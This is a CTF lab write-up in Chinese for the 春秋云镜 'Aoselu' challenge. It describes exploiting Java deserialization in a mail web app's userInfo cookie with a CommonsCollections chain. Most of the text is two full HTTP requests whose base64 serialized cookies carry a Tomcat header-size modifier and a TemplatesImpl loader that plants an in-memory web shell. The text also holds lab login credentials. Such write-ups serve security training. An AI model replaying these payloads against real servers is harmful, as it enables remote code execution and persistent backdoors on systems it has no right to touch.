春秋云镜 Aoselu

春秋云镜 Aoselu

flag1

39.99.144.221

题目有hint

rachel.cook9@aoseluauto.com/!QAZ2wsx

扫到后台端口为8080

用上面的账密登陆，登陆后cookie被设置为rO0A开头，一眼序列化数据

javachains看下数据格式，序列化的类为com.aoseluauto.mail.user.UserInfo，里面有age,email之类的字段

后台啥也不能点，不知道依赖组件，神了，不知道怎么试出来的

copy wp，这么配置，虽然不知道为什么非要这样配置

可以回显

javachains没有cc8好像

打一手内存马，用java-memshell-generator生成一个，因为是通过TemplatesImpl注入，所以AbstractTranslet封装一下

生成注入字节码，没这么长就更新一下yakit，低版本yakit有bug

根据之前写的一个shiro突破长度限制，因为Tomcat Header长度是通过配置org.apache.coyote.http11.AbstractHttp11Protocol#maxHttpHeaderSize来实现的，默认配置是8192字节，即8KB

https://godownio.github.io/2025/04/15/shiro-fan-xu-lie-hua-tu-po-chang-du-xian-zhi/

这里直接注入内存马就会超出长度限制，从代码上来说就是增大maxHttpHeaderSize 绕过Tomcat，刚好Yakit也集成了这个功能

用CC8先打一遍ModifyTomcatMaxHeaderSize，再注入内存马

GET /mail/u/0/ HTTP/1.1
Host: 39.98.109.156:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: userInfo=rO0ABXNyAFbBr8GywafArsGhwbDBocGjwajBpcCuwaPBr8Gtwa3Br8GuwbPArsGjwa/BrMGswaXBo8G0wanBr8GuwbPAtMCuwaLBocGnwK7BlMGywaXBpcGCwaHBp5SVecHY59tsAwAAeHBzcgCEwa/BssGnwK7BocGwwaHBo8GowaXArsGjwa/BrcGtwa/BrsGzwK7Bo8GvwazBrMGlwaPBtMGpwa/BrsGzwLTArsGjwa/BrcGwwaHBssGhwbTBr8GywbPArsGUwbLBocGuwbPBpsGvwbLBrcGpwa7Bp8GDwa/BrcGwwaHBssGhwbTBr8GyL/mE8CuxCMwCAAJMABLBpMGlwaPBr8GywaHBtMGlwaR0ACzBjMGqwaHBtsGhwK/BtcG0wanBrMCvwYPBr8GtwbDBocGywaHBtMGvwbLAu0wAFsG0wbLBocGuwbPBpsGvwbLBrcGlwbJ0AFrBjMGvwbLBp8CvwaHBsMGhwaPBqMGlwK/Bo8Gvwa3BrcGvwa7Bs8CvwaPBr8GswazBpcGjwbTBqcGvwa7Bs8C0wK/BlMGywaHBrsGzwabBr8Gywa3BpcGywLt4cHNyAIDBr8GywafArsGhwbDBocGjwajBpcCuwaPBr8Gtwa3Br8GuwbPArsGjwa/BrMGswaXBo8G0wanBr8GuwbPAtMCuwaPBr8GtwbDBocGywaHBtMGvwbLBs8CuwYPBr8GtwbDBocGywaHBosGswaXBg8Gvwa3BsMGhwbLBocG0wa/Bsvv0mSW4brE3AgAAeHBzcgB2wa/BssGnwK7BocGwwaHBo8GowaXArsGjwa/BrcGtwa/BrsGzwK7Bo8GvwazBrMGlwaPBtMGpwa/BrsGzwLTArsGmwbXBrsGjwbTBr8GywbPArsGJwa7BtsGvwavBpcGywZTBssGhwa7Bs8Gmwa/BssGtwaXBsofo/2t7fM44AgADWwAKwanBgcGywafBs3QAJsGbwYzBqsGhwbbBocCvwazBocGuwafAr8GPwaLBqsGlwaPBtMC7TAAWwanBjcGlwbTBqMGvwaTBjsGhwa3BpXQAJMGMwarBocG2waHAr8GswaHBrsGnwK/Bk8G0wbLBqcGuwafAu1sAFsGpwZDBocGywaHBrcGUwbnBsMGlwbN0ACTBm8GMwarBocG2waHAr8GswaHBrsGnwK/Bg8GswaHBs8GzwLt4cHVyACbBm8GMwarBocG2waHArsGswaHBrsGnwK7Bj8GiwarBpcGjwbTAu5DOWJ8QcylsAgAAeHAAAAAAdAAcwa7BpcG3wZTBssGhwa7Bs8Gmwa/BssGtwaXBsnVyACTBm8GMwarBocG2waHArsGswaHBrsGnwK7Bg8GswaHBs8GzwLurFteuy81amQIAAHhwAAAAAHcEAAAAAXNyAHTBo8Gvwa3ArsGzwbXBrsCuwa/BssGnwK7BocGwwaHBo8GowaXArsG4waHBrMGhwa7ArsGpwa7BtMGlwbLBrsGhwazArsG4wbPBrMG0waPArsG0wbLBocG4wK7BlMGlwa3BsMGswaHBtMGlwbPBicGtwbDBrAlXT8FurKszAwAGSQAawZ/BqcGuwaTBpcGuwbTBjsG1wa3BosGlwbJJABzBn8G0wbLBocGuwbPBrMGlwbTBicGuwaTBpcG4WwAUwZ/BosG5wbTBpcGjwa/BpMGlwbN0AAbBm8GbwYJbAAzBn8GjwazBocGzwbNxAH4AC0wACsGfwa7BocGtwaVxAH4ACkwAIsGfwa/BtcG0wbDBtcG0wZDBssGvwbDBpcGywbTBqcGlwbN0ACzBjMGqwaHBtsGhwK/BtcG0wanBrMCvwZDBssGvwbDBpcGywbTBqcGlwbPAu3hwAAAAAP////91cgAGwZvBm8GCS/0ZFWdn2zcCAAB4cAAAAAJ1cgAEwZvBgqzzF/gGCFTgAgAAeHAAAAl/yv66vgAAADQAggoABwA1BwA2CAA3BwA4CgAEADkKADoAOwcAPAoAOgA9BwA+CgACAD8IAEAKAEEAQggAQwoABwBECABFCgAEAEYKAEcAOwoARwBICABJBwBKCABLCABMCgAEAE0IAE4HAE8IAFAIAFEKAFIAUwoARwBUBwBVCABWCgBSAFcHAFkLACEAXAcAXQoAIwBeCgAmAF8HAGABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAFc3RhcnQBAA1TdGFja01hcFRhYmxlBwBhBwBiBwA8BwBKBwBdAQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAeTW9kaWZ5VG9tY2F0TWF4SGVhZGVyU2l6ZS5qYXZhDAAnACgBABBqYXZhL2xhbmcvVGhyZWFkAQAKZ2V0VGhyZWFkcwEAD2phdmEvbGFuZy9DbGFzcwwAYwBkBwBhDABlAGYBABBqYXZhL2xhbmcvT2JqZWN0DABnAGgBABNbTGphdmEvbGFuZy9UaHJlYWQ7DABpAGoBAARodHRwBwBrDABsAG0BAAhBY2NlcHRvcgwAbgBvAQAGdGFyZ2V0DABwAHEHAGIMAHIAcwEACGVuZHBvaW50AQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uAQAGdGhpcyQwAQAHaGFuZGxlcgwAdABvAQAFcHJvdG8BAC9vcmcvYXBhY2hlL2NveW90ZS9odHRwMTEvQWJzdHJhY3RIdHRwMTFQcm90b2NvbAEAEW1heEh0dHBIZWFkZXJTaXplAQAFNDA5NjAHAHUMAHYAdwwAeAB5AQAib3JnL2FwYWNoZS9jb3lvdGUvQWJzdHJhY3RQcm90b2NvbAEADnByb2Nlc3NvckNhY2hlDAB2AHoHAHsBADNvcmcvYXBhY2hlL3RvbWNhdC91dGlsL25ldC9BYnN0cmFjdEVuZHBvaW50JEhhbmRsZXIBAAdIYW5kbGVyAQAMSW5uZXJDbGFzc2VzDAB8ACgBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAB9ACgMACsAKAEACHFvQlZ5eFFKAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TdHJpbmcBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBABFqYXZhL2xhbmcvSW50ZWdlcgEAB3ZhbHVlT2YBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvSW50ZWdlcjsBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQArb3JnL2FwYWNoZS90b21jYXQvdXRpbC9uZXQvQWJzdHJhY3RFbmRwb2ludAEAB3JlY3ljbGUBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwB+DAAnACgKAH8AgAAhACYAfwAAAAAAAwABACcAKAABACkAAAAdAAEAAQAAAAUqtwCBsQAAAAEAKgAAAAYAAQAAAAoAKgArACgAAQApAAACqQADAA0AAAFIEgISAwO9AAS2AAVLKgS2AAYqAQO9AAe2AAjAAAnAAAlMAz0cK76iARkrHDK2AAoSC7YADJkBBSscMrYAChINtgAMmQD3KxwytgAOEg+2ABBOLQS2ABEtKxwytgASOgQBOgUZBLYADhITtgAQOgWnABE6BhkEtgAOEhW2ABA6BRkFBLYAERkFGQS2ABI6BgE6BxkGtgAOEha2ABA6B6cAKzoIGQa2AA62ABcSFrYAEDoHpwAXOgkZBrYADrYAF7YAFxIWtgAQOgcZBwS2ABEZBxkGtgASOggZCLYADhIYtgAQOgkZCQS2ABESGRIatgAQOgoZCgS2ABEZChkJGQi2ABISG7gAHLYAHRIeEh+2ABA6CxkLBLYAERkLGQkZCLYAEgO4ACC2AB0ZCMAAIToMGQy5ACIBAKcACYQCAaf+56cACEsqtgAksQAEAGIAbgBxABQAkQCdAKAAFACiALEAtAAUAAABPwFCACMAAgAqAAAApgApAAAAEAAMABEAEQASACEAEwApABQARQAVAFEAFgBWABcAXwAYAGIAGgBuAB0AcQAbAHMAHAB/AB4AhQAfAI4AIACRACIAnQApAKAAIwCiACUAsQAoALQAJgC2ACcAyAAqAM4AKwDXACwA4wAtAOkALgDyAC8A+AAwAQkAMQESADIBGAAzASgANAEvADUBNgA2ATkAEwE/ADsBQgA5AUMAOgFHADwALAAAAIMACv4AIwcALQcACQH/AE0ABgcALQcACQEHAC4HAC8HAC4AAQcAMA3/ACAACAcALQcACQEHAC4HAC8HAC4HAC8HAC4AAQcAMP8AEwAJBwAtBwAJAQcALgcALwcALgcALwcALgcAMAABBwAw+gAT/wBwAAMHAC0HAAkBAAD4AAVCBwAxBAAIADIAKAABACkAAAAgAAAAAAAAAAS4ACWxAAAAAQAqAAAACgACAAAADAADAA0AAgAzAAAAAgA0AFsAAAAKAAEAIQBYAFoGCXVxAH4AGAAAAPLK/rq+AAAAMQATAQADRm9vBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEAClNvdXJjZUZpbGUBAAhGb28uamF2YQEAFGphdmEvaW8vU2VyaWFsaXphYmxlBwAHAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoFceZp7jxtRxgBAA1Db25zdGFudFZhbHVlAQAGPGluaXQ+AQADKClWDAAOAA8KAAQAEAEABENvZGUAIQACAAQAAQAIAAEAGgAJAAoAAQANAAAAAgALAAEAAQAOAA8AAQASAAAAEQABAAEAAAAFKrcAEbEAAAAAAAEABQAAAAIABnB0AALBkHB3AQB4dwQAAAABeA==
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1

GET /mail/u/0/ HTTP/1.1
Host: 39.98.109.156:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: userInfo=rO0ABXNyAFbBr8GywafArsGhwbDBocGjwajBpcCuwaPBr8Gtwa3Br8GuwbPArsGjwa/BrMGswaXBo8G0wanBr8GuwbPAtMCuwaLBocGnwK7BlMGywaXBpcGCwaHBp5SVecHY59tsAwAAeHBzcgCEwa/BssGnwK7BocGwwaHBo8GowaXArsGjwa/BrcGtwa/BrsGzwK7Bo8GvwazBrMGlwaPBtMGpwa/BrsGzwLTArsGjwa/BrcGwwaHBssGhwbTBr8GywbPArsGUwbLBocGuwbPBpsGvwbLBrcGpwa7Bp8GDwa/BrcGwwaHBssGhwbTBr8GyL/mE8CuxCMwCAAJMABLBpMGlwaPBr8GywaHBtMGlwaR0ACzBjMGqwaHBtsGhwK/BtcG0wanBrMCvwYPBr8GtwbDBocGywaHBtMGvwbLAu0wAFsG0wbLBocGuwbPBpsGvwbLBrcGlwbJ0AFrBjMGvwbLBp8CvwaHBsMGhwaPBqMGlwK/Bo8Gvwa3BrcGvwa7Bs8CvwaPBr8GswazBpcGjwbTBqcGvwa7Bs8C0wK/BlMGywaHBrsGzwabBr8Gywa3BpcGywLt4cHNyAIDBr8GywafArsGhwbDBocGjwajBpcCuwaPBr8Gtwa3Br8GuwbPArsGjwa/BrMGswaXBo8G0wanBr8GuwbPAtMCuwaPBr8GtwbDBocGywaHBtMGvwbLBs8CuwYPBr8GtwbDBocGywaHBosGswaXBg8Gvwa3BsMGhwbLBocG0wa/Bsvv0mSW4brE3AgAAeHBzcgB2wa/BssGnwK7BocGwwaHBo8GowaXArsGjwa/BrcGtwa/BrsGzwK7Bo8GvwazBrMGlwaPBtMGpwa/BrsGzwLTArsGmwbXBrsGjwbTBr8GywbPArsGJwa7BtsGvwavBpcGywZTBssGhwa7Bs8Gmwa/BssGtwaXBsofo/2t7fM44AgADWwAKwanBgcGywafBs3QAJsGbwYzBqsGhwbbBocCvwazBocGuwafAr8GPwaLBqsGlwaPBtMC7TAAWwanBjcGlwbTBqMGvwaTBjsGhwa3BpXQAJMGMwarBocG2waHAr8GswaHBrsGnwK/Bk8G0wbLBqcGuwafAu1sAFsGpwZDBocGywaHBrcGUwbnBsMGlwbN0ACTBm8GMwarBocG2waHAr8GswaHBrsGnwK/Bg8GswaHBs8GzwLt4cHVyACbBm8GMwarBocG2waHArsGswaHBrsGnwK7Bj8GiwarBpcGjwbTAu5DOWJ8QcylsAgAAeHAAAAAAdAAcwa7BpcG3wZTBssGhwa7Bs8Gmwa/BssGtwaXBsnVyACTBm8GMwarBocG2waHArsGswaHBrsGnwK7Bg8GswaHBs8GzwLurFteuy81amQIAAHhwAAAAAHcEAAAAAXNyAHTBo8Gvwa3ArsGzwbXBrsCuwa/BssGnwK7BocGwwaHBo8GowaXArsG4waHBrMGhwa7ArsGpwa7BtMGlwbLBrsGhwazArsG4wbPBrMG0waPArsG0wbLBocG4wK7BlMGlwa3BsMGswaHBtMGlwbPBicGtwbDBrAlXT8FurKszAwAGSQAawZ/BqcGuwaTBpcGuwbTBjsG1wa3BosGlwbJJABzBn8G0wbLBocGuwbPBrMGlwbTBicGuwaTBpcG4WwAUwZ/BosG5wbTBpcGjwa/BpMGlwbN0AAbBm8GbwYJbAAzBn8GjwazBocGzwbNxAH4AC0wACsGfwa7BocGtwaVxAH4ACkwAIsGfwa/BtcG0wbDBtcG0wZDBssGvwbDBpcGywbTBqcGlwbN0ACzBjMGqwaHBtsGhwK/BtcG0wanBrMCvwZDBssGvwbDBpcGywbTBqcGlwbPAu3hwAAAAAP////91cgAGwZvBm8GCS/0ZFWdn2zcCAAB4cAAAAAJ1cgAEwZvBgqzzF/gGCFTgAgAAeHAAAEI2yv66vgAAADQAVwoAFAAhCAAiCgAFACMIACQHACUHACYKAAUAJwoAKAApCgAqACsIACwKAC0ALgoABQAvCgAwACkHADEKADIAMwoAMAA0CgAoADUKAAUANgcANwcAOAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwA5AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwA6AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBABxUZW1wbGF0ZUltcGxDbGFzc0xvYWRlci5qYXZhDAAVABYBAE5jb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsJFRyYW5zbGV0Q2xhc3NMb2FkZXIMADsAPAEAC2RlZmluZUNsYXNzAQAPamF2YS9sYW5nL0NsYXNzAQACW0IMAD0APgcAPwwAQABBBwBCDABDAEYBOwx5djY2dmdBQUFERUJTQUVBSm05eVp5OWhjR0ZqYUdVdmJHOW5aMmx1Wnk5bkwxTmxjbWxoYkdsNllYUnBiMjVWZEdsc0J3QUJBUUJBWTI5dEwzTjFiaTl2Y21jdllYQmhZMmhsTDNoaGJHRnVMMmx1ZEdWeWJtRnNMM2h6YkhSakwzSjFiblJwYldVdlFXSnpkSEpoWTNSVWNtRnVjMnhsZEFjQUF3RUFEV2RsZEZWeWJGQmhkSFJsY200QkFCUW9LVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBQkVOdlpHVUJBQTlNYVc1bFRuVnRZbVZ5VkdGaWJHVUJBQkpNYjJOaGJGWmhjbWxoWW14bFZHRmliR1VCQUFSMGFHbHpBUUFvVEc5eVp5OWhjR0ZqYUdVdmJHOW5aMmx1Wnk5bkwxTmxjbWxoYkdsNllYUnBiMjVWZEdsc093RUFBaThxQ0FBTUFRQU1aMlYwUTJ4aGMzTk9ZVzFsQVFBdWIzSm5MbUZ3WVdOb1pTNXNiMmRuYVc1bkxsTmxjblpzWlhSRGIyNTBaWGgwU1hoSmJuUmxjbU5sY0hSdmNnZ0FEd0VBRDJkbGRFSmhjMlUyTkZOMGNtbHVad0VBQ2tWNFkyVndkR2x2Ym5NQkFCTnFZWFpoTDJsdkwwbFBSWGhqWlhCMGFXOXVCd0FUQVFBUWFtRjJZUzlzWVc1bkwxTjBjbWx1WndjQUZRRVBNRWcwYzBsQlFVRkJRVUZCUVVGS1ZsaERXSGhpWkZJekx5OXdkV3RNTURORVRuUnhkRmM1YmtkRWRHbFhUa2N6VkdwaE0zSlhielJsU3pkVVVXUkhUV1JJWkRGVlprVXhabTA1UVRCNVdrdFlXR2QzVVU5alVucHBibXBuWjFSeFZtVlJkMlJFVGt0WFEyTjNSRlZNZW5kUlJsRlZUSHA0UW01TVkyOVZURGN2T1RFM1V6bEhUSG80TW01bVpTOXVMMllyWmpOa0x6TXZhamN2ZVhkRlRVRk9iMjk1WjJOd1dXOXpLM1o0ZEZablUxQk9TRmx1TVRrMFYybG1kakJPVEVSRldUQjJVMnRYTVdKV2FIWllWelJzWlRsRlZVbDJjbk5aVVVOSllrUnJZVzVXVVRsVlpGVnJhbHBHTVVkVGVVeGhZakpoVG5sNVExZDVWalJ3VEhoQ1RWZ3dTblJSUW1KVGFWYzJVR05RWVdRekszQkRibFF6TlVGamFWRmFZakZIYUZCU1JYUk5heXR6VVhsRU9DOUlRVE55Um5keVdWQk9OVTlCV0hSVWNrVmpWRmRPWjFkcWJYSjBjVmxHZFV4aVJtSTNXVFYzY0dGbmRFWnNVV3B1VjI5cFRFZzVZbWt6V1RsR1JUUkxWa3hZT1daM04xWjFZVWhCTmxsSlpFTjNWRTg0Y2xST05sWnhaRTVGWlUxRGFYbGtXakU0UzFkVFUwWkdTazV0YVhGU1JHd3dRVEJ3YzBsU1FUVTRiRXh3VWtsT1psazBUMkZWWWsxNWEzQmFlR3hMUXpWRFNITTBhVWRIYnpseU1GSTJRa056T1hOUmRTdHpTbFZ6VEZKaGVrRlRjVzV2WWs5TVdYSTBNalJ6Wkc5VmRWVmlRWEZqWkUxWmIwaEdiblJyYVhsSWMwOTZjRmM0Tmpobk56Qk1Ua1paVURGd05sTmlha0p1YUdOV1QwdFdXRFJaTmtoNFJ6ZHVURzVwTW1SbWIyNVpiR0Z1VlVKbGMwcDFVR1paTUVOb1ZERmhUSGxPYzJKQ1FUa3djbVV5ZW5WYWQxbDVUVEpUV1ZSUWJ6bDRhRUZaVmpCbE56SlRkak5wUzNSSWJGbENhbFZqYVhseVdWTnlTV2N4VW5WRGFIWXpRbmhCYVdvM1Z6aExlREJRUldsRFJWbFdRazlpVFRsemVtMU1hM1JoU1d0Wk5GQTVaVUpXVjFkcGFHeERSa1JSU1c1T1IyaHhPRWdyWjBKeE0ydDBSRmN3VG5wb2VFaFpOakZoWm5CeVpFZHJjbXRoUkZoUVlrOXBLMHBOZVRsNU5FZEtaVFF3U1dkWFoxWllWRU5LU25oTVkyaEZSR2xaTUM5VVNuUndTVTh2UmtaM2NYTkhhVzFaUVZaMFJFUlVWazQwTjI5SGRESjNaVFJwVTBjck0xazBWVWxCVHpBeVJUVjZRMjVWSzJKM1RHaGpkVkYzWlZwYVEwWkxNR3hoVkUxeGEwWlZORzEzVUhWTGJtRnZVREJEYmxKTFN5OWpkMFZFTW5ocE9FNVNUbU5MUld4aFIxZDFjbkYzVmpJM2RVVjVhVWxLZWxONk1rRldObEJLWWtodFZsbFJNSFpYTkhZMFZWQnhlbmd6WVdaMFZGZHNTM1pQZVZaYVRXZzJURXB5VnpaSVEyUXlaRVlyZEVKbVZUWTNNVFpDTVZaUGNscG5SREJ6UTNGcWJYQk5ZbFl3TW01cGExTXdVR3BZVTBWQmVIRjVWMUZQYkdOeWR6a3dOblpWYTNOT1RpdG9VR0pyZUROaFlqQlNOMjlSU0hSU01YaE1WRVprV0RVd2N6VlZVbWxTTkhGQmNtcEtOWGRxUnk5cVJUVkVTWEZIVDJORU1tVXdhR3RHVkZJd1ozRmFTMnRHWlZOcGFXWlFhbGxHUkVsTVR6VlNaRnB4Y0VwRmVtdENSR0ZqU25OVVRXdEpVVVpaT0dGU01IZERZMjFyU20wMWVGazBLemRYVGxVM1FtWlpUakZ3UjJGUFFWZGljaXM1UlhoUmEwcHhWemh0V2tGR1FYZEtja2g0VGxwQ1YwMVhSWEJQU0ZSQlJqRjNhVFJSY0hKek4wOHlZMWxYTldOaE4yRXdOalZxVVV4TGQxZFpPR1ZPVGpoR1ZFTkNNRE56VG5CT05HczBNV3RwVERGcVUySXhWRkZSTlhsSmJXcG9jVTR3WTFCdE1EQlNTbE5GZUROVFpUTlpTRXB4TUdKMEswRjBjMnB3ZG5CV05IRTJUV2xyZDBaeFVEa3hVa28wVFdKaU9FaGFjSGhxYzBVelQxUmtjV054ZUhFd2RqY3piVmhoWkRWQ1YyUXhaSFl6Y1RSR2FsaEdZVTFzWTNacmJGZzNTSFIzYlU4dmFEY3paR2xEWVhadU1WQnpXVGR5YnpWRlQwOUxZeXRKUVhCMmEwVnVVak5rU3pFd05EbEhjWGhwWTJWTlQyWkxaMUZEV0hwWllrVjBWMjU1THpKNlRsaHFVRFJ2TjFoU2FrZDRlbW94V2pKM2NTdEpWRUZuWjNrdlQxaFpSbE50WkV4NVZUZHJWQ3RLVkV4b2VrTndObFZ5ZUZjMVZXOUdTaXRtV1ZvclNrdG1OWE5YUlU5UUsxcHZURmQ0Tm00NFVHNXdVMDVJUjB0V05FSjFZV3RGTVN0UlMwSTVlRmxXVkU4NWMwdHZUbXBVVml0TFpGQXlVM2RwT1N0TFdVNVBNQ3R1YW1oNVZXcE1SbFpxVjJjMVlWSm9WMjFDV25KdVJ6ZFJORzVaYTBKM01GWnlZMlZrTWtWTlJUSjNkbFJEVlRGcmNGUkVaSEUyWlRaTlduaG1SVzVESzNGRFduWXpkbGw1VTFZMFUzcFFSM05YYURJd2JURnlaeTlaT1dwQ1QwWkhUVk5ZVTFvNVRXUlRaWFJKTUU5S1dpOXdaM3B6Tnl0eUswcHlUVzV6Wm5samVtazJaa2xWVUVOaVowZEtUR1pOZVhwTlIxUXpabmRQVFhWbVFqTm1iRWRpZVRoR1IyOTROMHBzTjAxYU16VlBkMkY0V0dOYWRXMDBNWEZXVm5aaWJ6VnRZMjV1TmpSVFNuSXdabVozWmxKdWMwZ3dhVVk0T1c0NGNFeFVOVkkwZUd4R2JrVnBkVWhNUjNaQmRYZDZUbEVyWWxoMU5Ib3llV0pPYnpWbVVHZFFZblI2YW5oT1MzWTJUbUZuVmk5R2VHYzBMM2hHVFc4NFQyVlJURFJvVVhaUU5FcGpUV0pGVTB3NWRXdG9OREJFWXpaellYWTRVblJ3T0RkUVkxTk5XRm9yYWxoNlIwMVRiMFZOU0dZMFptVlRObmM1VFU5clVEaG5TM0ZJTDBremFGQnVibGMzV2s1U0swSlFXbVZuZDJSaWFuZDJSVmd3UjJZMVdrUjFOVlZaUjNWdU1FWjRaV1YzTUd3MVFtNTRVMloyTTA1RFRVMVdVRWxSYlcxdmFUWkhMeXRSV2poTlFTOXJiWFJhWjBOWlVTOXNiVkZCVkU5dVQwOU5TbmM1V2pGVWVteGtVazVaZURaQ2MycHNZbnB5YTNwd05GVm9iRzg0U0hGNFRYTlZNa0p6ZWxkcE1XNTRhVzAyVTNGYVZGUkVTbmRQUTFORk1sUkZkR1UxZVVOV05VTnBabUpRU1VabFJYZFZlaXRuTm1GRldXbzVWREZqTW1sYWVscGhjazR5UlU5RVREaHdiMk0wZEVaUFIxVkNhRkYzTm1abVRuSnFjRVpHVEVvME5USk9XSGhDYlVWTWFIZGthbEJZVkRWWE1YcFdUekJqU1hWbWNVcEhTMmhYVDFGVFF6aFRXamRKTW1GblkwWjFOalJVZGtaTWVVdHNRMUpVTUdOeFFtTkVTbGt5WkdwUk1GcDVjRWM0U3pCU1JGbE9ORFJrVkV4S1ZtNVBUVEpMY0hkVVZHNUNVMnRyY0dOUll6aGpjRlp6ZVZkc2NWaHFWR05PZERCcVYyMWxiblpzZVcxeU1pdDJUMFJGWlUwMk5UaFJlV2gyTWpoWlRGWlhNVll5YW1KbmRIVXpURXB3TURKaVZrdGpObXhZYnpWb1RGTkZXakZxVFN0c09GSkVLMnhDVlRKNkwyOUdRalp6V1dadVlWRlJVR2RSU1VjNFZTOUVRelp3VXpOSkswODVNbTVuVEU5YWFVNDVORE5IZFRSQ1puWk5lbmhYWTBKbVJGcFJaeXRETkhWSE9GQkRjMjFMZURSWU5XTjZOV1l6Wm5SNE9FUTFabnB0UkN0Qk4wSk1aMnBoYTBsTE1VaEpURGRtU25kMlkxcG9iVUpsTm5sNGVFVldTa3N5Y1c5NU0zaG5WMVExWkROSVExWmtXVEZvTmt3MVlXNXpaWEJsY2s5VmVtcG1XR3BMUkhWSE9HbHNaRU15UkdwamVsZHNjalJGWm1GM01UbEtZVnBOVXpVdk9FOXdUekk0U1VGd05UVlhiQ3RSU1VOSllXdExlVzUzTWpNd1Rtb3lTSGN3UzNwTVprMUlaRGxxY1dsRGNrdG5RMHR4YTNsU1NFZGxWelpMWlVsdlpXUmlNVGxTT0hwb1lUSjVkRmN6UVVoR1ptaG9Nbmd6Um1NeGJWVlpabTVzVWpoNGFESndNMFpzYUZNclRqRjRNWFJHTUdOT1JtSjZaVzlaWWpKMWQzaEdSR28zVEV0aGNVTlliRko1ZUhjNGRsWlZhMnBPYmsxMmJqWjJZbFZGZEhGTU1ESnhkeTl0UnpNM05uTlpWRFUyVmtkV1NUbGxSa05ZUlZOaFNtNDJWR0ZvU1V4WlZtVlJjRFpDWlV0TWVFRjVUV05yZEROTVdDdE9SVzlLY2tWVlRtMTBVbFYwVmxFeWRYWjRRbXR4YVdzemJIVkpNbGRCYXpjMmVTc3pSRGxDVGpaamFEQm1lRGRPVVZCbWRIbGplR3gyZG5kQ1R5dERZbmhVYjA1aWRWa3JVVzA0VHpRNGFrOVFNbGRyWkZweFkwOVhlSFowY2toaFdESnZaemxQTkVOT05XVkJlSEkxWm1SNE5VaFhWbkJtU0hoT1R6UmhkeXRHVTFKNGNXWnVZMFJrVG1oNlIxUmlObWxNTlZrMlNtNUVWWGhzYXpkNWJIazBjSHBaTDNrek1FTm9PVXMwZGpGWk5XcEpWekY2ZFUxWk5ubHdNV3AxUjBKb01IVldNSFozTUVoMGNGUnhkbXByY1ROM1ExaDRSVGhIV2xSaVJta3hTelE1UlRCMmJGZHhjRkJHZEdFM01VMHdhalZvY0RGdWFpdERTRE56ZEZOVEswTnJkVEpKTjFscU9HZHFTMmMzYVU1eWVsSmxibVJpUldSMVJuaFllRmROS3lzeVRXbFpNV1pITlVSUVUxQlZlSFZxTUUxNGIzQjRkVVUyUm5ONFFtSkRaRmhKTWpWdVVrODFSVTByTjBOS1ltZGlURlIzVUhSUFNWSllTWEZ1WlZSME9HNXBVR2RDWlhkM2IzUXhURFpSWlhCSk5HZGxWbk55ZEM5TFZuaDZWV3hhVldaUmFIaEZlVFJyZUdSUVl6bGtURU5YUm1ONlpsUmllV3hPVEZCNlRrRmFkRWhLWWtaaFkxcEpWVTVIUm14NGEzUjNlRWsxYkZCSmF6VmxiVFZGWmpGWVF6aHFTRFJHYmtkVU1Xc3dlRFY0V1djdmNDdDVaMmR0Um5wWFpVVm9aMlJzZHpSRFZWVmpkVEZHUWtZ